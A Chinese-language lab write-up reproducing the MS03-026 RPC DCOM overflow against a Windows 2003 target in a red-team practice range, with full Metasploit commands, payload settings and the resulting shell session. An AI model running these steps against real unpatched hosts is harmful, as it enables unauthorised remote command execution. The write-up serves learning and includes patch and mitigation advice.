环境
- 红日靶场:ATT&CK红队评估01 - win2k3 192.168.52.141
- 攻击机:32位 kali 172.24.4.7
- 已做内网流量转发
MS03-026复现过程
漏洞介绍
MS03-026是一个影响多个版本的Microsoft Windows操作系统的远程可利用缓冲区溢出漏洞。该漏洞存在于RPC接口中,具体是Distributed Component Object Model (DCOM)接口的实现部分。这个漏洞允许攻击者在目标主机上执行恶意代码。
漏洞的实质是,在处理通过TCP/IP进行信息交换时,RPC部分存在问题,远程攻击者可以利用这个漏洞以本地系统权限在系统上执行任意指令。具体来说,这个漏洞影响的是使用RPC的DCOM接口,该接口处理由客户端机器发送给服务器的DCOM对象激活请求(如UNC路径)。攻击者通过向目标发送畸形RPC DCOM请求来利用这个漏洞。
此外,已知有一系列的蠕虫(如Blaster)在野外利用了这个漏洞。为了防御这个漏洞,建议重新连接系统到网络并应用MS03-026中提到的补丁。此外,可以根据站点需求禁用DCOM,这也是一种防御措施。
总结来说,MS03-026是一个严重的安全漏洞,它允许攻击者远程执行代码。为了保护系统,需要及时应用补丁和采取其他防御措施,如禁用DCOM等。
执行命令:msfconsole
┌──(kali㉿kali)-[~]
└─$ msfconsole
Metasploit tip: View missing module options with show missing
____________
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $a, |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $S`?a, |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
[%%%%%%%%%%%%%%%%%%%%__%%%%%%%%%%| `?a, |%%%%%%%%__%%%%%%%%%__%%__ %%%%]
[% .--------..-----.| |_ .---.-.| .,a$%|.-----.| |.-----.|__|| |_ %%]
[% | || -__|| _|| _ || ,,aS$""` || _ || || _ || || _|%%]
[% |__|__|__||_____||____||___._||%$P"` || __||__||_____||__||____|%%]
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| `"a, ||__|%%%%%%%%%%%%%%%%%%%%%%%%%%]
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%|____`"a,$$__|%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% `"$ %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
=[ metasploit v6.4.9-dev ]
+ -- --=[ 2420 exploits - 1248 auxiliary - 423 post ]
+ -- --=[ 1468 payloads - 47 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit Documentation: https://docs.metasploit.com/
执行命令:search ms03-026
msf6 > search ms03-026
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/dcerpc/ms03_026_dcom 2003-07-16 great Yes MS03-026 Microsoft RPC DCOM Interface Overflow
Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/dcerpc/ms03_026_dcom
执行命令:use 0 或 use exploit/windows/dcerpc/ms03_026_dcom
msf6 > use 0
[*] Using configured payload windows/shell/reverse_tcp
msf6 exploit(windows/dcerpc/ms03_026_dcom) >
执行命令:set rhost 192.168.52.141
msf6 exploit(windows/dcerpc/ms03_026_dcom) > set rhost 192.168.52.141
rhost => 192.168.52.141
执行命令:set lhost 172.24.4.7
msf6 exploit(windows/dcerpc/ms03_026_dcom) > set lhost 172.24.4.7
lhost => 172.24.4.7
执行命令:set payload generic/shell_bind_tcp
msf6 exploit(windows/dcerpc/ms03_026_dcom) > set payload generic/shell_bind_tcp
payload => generic/shell_bind_tcp
执行命令:show options
msf6 exploit(windows/dcerpc/ms03_026_dcom) > show options
Module options (exploit/windows/dcerpc/ms03_026_dcom):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.52.141 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/
using-metasploit.html
RPORT 135 yes The target port (TCP)
Payload options (generic/shell_bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST 192.168.52.141 no The target address
Exploit target:
Id Name
-- ----
0 Windows NT SP3-6a/2000/XP/2003 Universal
View the full module info with the info, or info -d command.
执行命令:exploit 或 run
msf6 exploit(windows/dcerpc/ms03_026_dcom) > exploit
[*] 192.168.52.141:135 - Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] 192.168.52.141:135 - Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.52.141[135] ...
[*] 192.168.52.141:135 - Calling DCOM RPC with payload (1648 bytes) ...
[*] Started bind TCP handler against 192.168.52.141:4444
[*] Command shell session 1 opened (172.24.4.7:34395 -> 192.168.52.141:4444) at 2024-06-09 12:23:25 -0400
Shell Banner:
Microsoft Windows [Version 5.2.3790]
-----
C:\WINDOWS\system32>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.52.141
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.52.2
反弹shell成功
PS:仅学习,有什么不对请各位大大斧正
请确保在使用这些技术时,您有权这么做,并且您的行为符合法律法规和道德准则。这些信息仅供教育和研究目的使用。